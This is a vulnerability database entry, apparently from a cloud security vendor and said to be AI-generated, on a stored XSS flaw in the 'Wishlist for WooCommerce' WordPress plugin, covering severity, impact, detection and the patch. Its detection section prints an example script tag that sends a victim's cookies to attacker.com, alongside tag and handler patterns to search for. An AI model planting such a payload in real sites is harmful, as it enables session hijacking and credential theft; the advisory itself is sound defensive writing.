
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-69334 is a Stored Cross-Site Scripting (XSS) vulnerability in the WPFactory "Wishlist for WooCommerce" WordPress plugin (slug: wish-list-for-woocommerce). It affects all versions up to and including 3.3.0, and was reported by researcher Muhammad Yudha - DJ on November 30, 2025, with public disclosure on December 30, 2025 via Patchstack. The CVE was published to NVD on January 6, 2026. It carries a CVSS v3.1 base score of 6.5 (Medium), assessed by CISA-ADP (Patchstack, NVD).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. Insufficient sanitization and/or escaping of user-supplied input in wishlist-related fields allows an authenticated attacker (with at minimum Contributor or Developer-level privileges) to inject malicious JavaScript or HTML payloads that are persistently stored and later rendered in victims' browsers. Exploitation requires user interaction — a privileged user must visit or interact with the page containing the injected payload. No public proof-of-concept code has been identified at this time (Patchstack, NVD).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browser sessions, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, or redirection to malicious sites. The scope is changed (S:C), meaning the injected script can affect users beyond the attacker's own session, including site administrators. Confidentiality, integrity, and availability impacts are each rated Low, reflecting the bounded but real risk of data exposure and content manipulation on affected WooCommerce stores (Patchstack).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-69334. The EPSS score is approximately 0.033%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of individual site traffic (Patchstack, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or similar XSS payload in a field that lacks proper sanitization./wp-admin/admin-ajax.php or plugin-specific REST routes) containing encoded script tags or JavaScript event handlers (<script>, onerror=, onload=, javascript:).<script> tags or JavaScript URIs stored in the wp_posts, wp_postmeta, or plugin-specific database tables associated with wishlist entries.The vendor (WPFactory) has released version 3.3.1 of the "Wishlist for WooCommerce" plugin, which patches this vulnerability. Site administrators should update the plugin to version 3.3.1 or later immediately via the WordPress dashboard or by downloading from the WordPress plugin repository. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard. If an immediate update is not possible, consider temporarily deactivating the plugin or restricting Contributor/lower-privilege user registration until the patch is applied (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."